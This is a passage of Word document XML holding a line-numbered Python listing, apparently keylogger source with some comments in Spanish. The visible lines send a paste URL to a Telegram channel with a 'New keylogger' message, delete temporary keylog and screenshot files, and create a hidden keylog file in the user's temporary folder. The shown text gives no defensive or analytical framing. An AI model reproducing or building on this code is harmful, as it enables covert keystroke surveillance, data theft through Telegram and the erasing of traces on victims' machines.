        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="807" w:name="l460"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">460  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="807"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Sends to Telegram Channel the url of paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="808" w:name="l461"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">461  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="808"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>telegram_bot_message</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'New keylogger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9" w:name="l462"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">462  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="809"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="810" w:name="l463"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">463  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="810"/>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11" w:name="l464"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">464  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="811"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="812" w:name="l465"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">465  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="812"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="813" w:name="l466"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">466  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="813"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Delete all temporary keylog files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="814" w:name="l467"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">467  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="814"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># A pattern and a message can be set and reused to erase the screenshot files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="815" w:name="l468"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">468  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="815"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>delete_keylog_tempfile</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=None</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>logmsg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'Borrado fichero tempora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16" w:name="l469"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">469  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="816"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">is None:     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># If no pattern is received, by default it deletes all keylog files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="817" w:name="l470"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">470  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="817"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern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KLGEXT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="818" w:name="l471"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">471  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="818"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="819" w:name="l472"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">472  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="819"/>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0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="820" w:name="l473"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">473  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="820"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">folder_files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 xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>pattern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="821" w:name="l474"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">474  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="821"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">file_remove </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>glob</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>glob</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>folder_file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22" w:name="l475"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">475  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="82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 : {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>logmsg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>file_remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="823" w:name="l476"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">476  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="82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824" w:name="l477"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">477  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="824"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>file_remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">)              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Try to remove file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="825" w:name="l478"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">478  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="825"/>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26" w:name="l479"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">479  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="82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827" w:name="l480"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">480  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="82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borrando archivo {}. Excepcion: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remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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828" w:name="l481"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">481  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="828"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="829" w:name="l482"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">482  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="829"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">count  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Return number of deleted files (if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="830" w:name="l483"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">483  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="830"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="831" w:name="l484"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">484  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="831"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="832" w:name="l485"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">485  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="832"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Create empty keylog file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="833" w:name="l486"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">486  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="833"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>create_keylog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34" w:name="l487"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">487  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="834"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>keylog_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>key_buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="835" w:name="l488"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">488  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="835"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="836" w:name="l489"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">489  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="836"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Create keylog file in the user's temporary folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="837" w:name="l490"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">490  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="837"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
